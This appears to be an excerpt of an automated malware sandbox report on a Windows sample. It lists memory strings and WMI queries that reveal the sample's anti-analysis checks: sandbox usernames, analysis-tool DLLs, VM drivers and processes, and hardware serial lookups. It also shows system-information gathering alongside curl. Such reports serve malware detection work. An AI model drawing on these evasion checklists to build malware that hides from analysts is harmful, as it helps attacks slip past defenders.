Source: 9KEZfGRjyK.exeBinary or memory string: DBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOM
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: 9KEZfGRjyK.exeBinary or memory string: API_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEM
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1780099999.00000299E7920000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLLOWSTEMP
Source: tasklist.exe, 00000018.00000002.1784950897.000001E418A0B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1783904747.000001E418A0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLLT
Source: tasklist.exe, 00000018.00000002.1784950897.000001E418A0B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1785131555.000001E418B30000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1783904747.000001E418A0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1779777600.00000299E7650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M API_LOG.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000018.00000002.1784817596.000001E4189D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M DIR_WATCH.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1760771163.000002991D828000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1760049495.000002991D827000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1759911172.000002991D816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: tasklist.exe, 00000016.00000002.1779777600.00000299E7650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000018.00000002.1785131555.000001E418B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLLTEMP
Source: tasklist.exe, 00000012.00000002.1760924301.000002991D9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLLOWSTEMP
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - API_LOG.DLL
Source: tasklist.exe, 00000016.00000003.1779101879.00000299E7688000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1778941181.00000299E7685000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1779926159.00000299E7689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLLM
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - SBIEDLL.DLL
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe File opened / queried: C:\windows\sysnative\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe File opened / queried: C:\windows\sysnative\drivers\vmmouse.sys
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT IdentifyingNumber FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe Code function: 0_2_00007FF7B902EB20 CloseHandle,FindFirstFileW,FindClose, 0_2_00007FF7B902EB20
Source: tasklist.exe, 00000026.00000002.1825703380.000001C0633E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exea\Local\Tem
Source: 9KEZfGRjyK.exeBinary or memory string: wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000026.00000002.1825703380.000001C0633E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'PROI
Source: 9KEZfGRjyK.exeBinary or memory string: malwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: testadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: workvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: analysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: pstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: usertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: defaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: dir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: adminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: LisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1814579848.00000219841A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: api_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystem
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: BrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: AdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe\wmic.exejavapathJnyZ"
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: Georgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: georgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWP
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000003.1817488080.000002B99E376000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'0
Source: tasklist.exe, 00000024.00000002.1820839789.000002B99E350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: tasklist.exe, 00000024.00000003.1817858101.000002B99E386000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"155041831387140 g
Source: getmac.exe, 0000000D.00000003.1749820674.000001733F58F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1750713120.000001733F597000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1749909296.000001733F594000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: harry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: vboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000022.00000002.1814831162.00000219841DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1822311412.000002B99E635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'>
Source: 9KEZfGRjyK.exeBinary or memory string: brunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1749820674.000001733F58F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1750713120.000001733F597000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1749909296.000001733F594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: 9KEZfGRjyK.exeBinary or memory string: vtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - vboxservice.exe32
Source: tasklist.exe, 00000026.00000002.1825465912.000001C063240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: rootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exe
Source: 9KEZfGRjyK.exeBinary or memory string: vmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exe.
Source: system_info.txt.0.drBinary or memory string: - vboxservice.exe
Source: 9KEZfGRjyK.exeBinary or memory string: VBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1820839789.000002B99E350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxservice.exe"C:\Windows\system32\tasklist.exeWinsta0\Default1JS
Source: 9KEZfGRjyK.exeBinary or memory string: Paul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1820839789.000002B99E350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxservice.exe"uJSTW
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp, 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - vboxtray.exe
Source: getmac.exe, 0000000D.00000002.1750591202.000001733F560000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750010796.000001733F54A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1750117474.000001733F55E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 9KEZfGRjyK.exeBinary or memory string: dekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1814467976.0000021984195000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'PROS
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exdic.exeok
Source: 9KEZfGRjyK.exeBinary or memory string: XENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: vmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: dbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcom
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'##
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxtray.exe
Source: tasklist.exe, 00000022.00000002.1814579848.00000219841A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"C:\Windows\system32\tasklist.exeWinsta0\Default
Source: 9KEZfGRjyK.exeBinary or memory string: sandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1825465912.000001C063240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxtray.exe"C:\Windows\system32\tasklist.exeWinsta0\Default
Source: 9KEZfGRjyK.exeBinary or memory string: abbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: system_info.txt.0.drBinary or memory string: - vmtoolsd.exe
Source: 9KEZfGRjyK.exeBinary or memory string: AlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: 9KEZfGRjyK.exeBinary or memory string: VMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1824606109.000001C063266000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000002.1825555364.000001C06326C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: vboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exd
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exe
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.dr | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: 9KEZfGRjyK.exe | Binary or memory string: wpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: curl.exe, 0000002D.00000003.2465008395.0000025DD64D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 9KEZfGRjyK.exe | Binary or memory string: fredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1822311412.000002B99E630000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasklist/fiIMAGENAME eq vboxservice.exel\Te
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasklist/fiIMAGENAME eq vboxservice.exe?y
Source: 9KEZfGRjyK.exe | Binary or memory string: FredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
